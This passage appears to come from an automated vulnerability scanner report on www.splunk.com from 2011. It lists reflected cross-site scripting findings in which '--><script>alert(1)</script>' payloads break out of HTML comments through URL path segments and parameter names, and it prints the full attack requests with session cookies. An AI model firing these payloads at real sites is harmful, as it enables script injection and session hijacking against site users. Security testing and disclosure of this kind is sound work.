HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:14 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 5dbc03112d1392066e48343951ae874d1297008194 Last-Modified: Sun, 06 Feb 2011 16:03:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 760d6--><script>alert(1)</script>4082375e06b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/splunk-at-whitepages760d6--><script>alert(1)</script>4082375e06b/SP-CAAAFUY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 66f8767cdc34440646d89547f362c1001297008219 Last-Modified: Sun, 06 Feb 2011 16:03:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18415
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 336b9--><script>alert(1)</script>d6244de34b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/splunk-at-whitepages/SP-CAAAFUY336b9--><script>alert(1)</script>d6244de34b3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:03 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 33b75e3e3844ad4e79be0f80356551121297008244 Last-Modified: Sun, 06 Feb 2011 16:04:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18415
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.607. http://www.splunk.com/view/splunk-at-whitepages/SP-CAAAFUY [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/splunk-at-whitepages/SP-CAAAFUY
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ea734--><script>alert(1)</script>daea00f9957 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/splunk-at-whitepages/SP-CAAAFUY?ea734--><script>alert(1)</script>daea00f9957=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: eb0510474468914a4b54ffba6c9acb661297008170 Last-Modified: Sun, 06 Feb 2011 16:02:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload a0b21--><script>alert(1)</script>0988a50efef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewa0b21--><script>alert(1)</script>0988a50efef/support-documents/SP-CAAAAD4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 246c2--><script>alert(1)</script>6666c625d55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-documents246c2--><script>alert(1)</script>6666c625d55/SP-CAAAAD4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:57 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:57 GMT; path=/ ETag: b3a59d8e5ec2a1bfc5e2107fdc3f7f8d1296944337 Last-Modified: Sat, 05 Feb 2011 22:18:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload fce0c--><script>alert(1)</script>d89b6dd1fe7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-documents/SP-CAAAAD4fce0c--><script>alert(1)</script>d89b6dd1fe7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.611. http://www.splunk.com/view/support-documents/SP-CAAAAD4 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/support-documents/SP-CAAAAD4
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35822--><script>alert(1)</script>8e155c440b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-documents/SP-CAAAAD4?35822--><script>alert(1)</script>8e155c440b5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21552
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 1e04b--><script>alert(1)</script>9352c4b4007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view1e04b--><script>alert(1)</script>9352c4b4007/support-programs/SP-CAAACC8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 725b2--><script>alert(1)</script>5959191eed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-programs725b2--><script>alert(1)</script>5959191eed4/SP-CAAACC8 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 67e7c--><script>alert(1)</script>102368518a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-programs/SP-CAAACC867e7c--><script>alert(1)</script>102368518a3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.615. http://www.splunk.com/view/support-programs/SP-CAAACC8 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/support-programs/SP-CAAACC8
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2dd1--><script>alert(1)</script>4151639d24c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/support-programs/SP-CAAACC8?c2dd1--><script>alert(1)</script>4151639d24c=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3d093--><script>alert(1)</script>310d4d8b3fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view3d093--><script>alert(1)</script>310d4d8b3fe/support/SP-CAAAAFV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
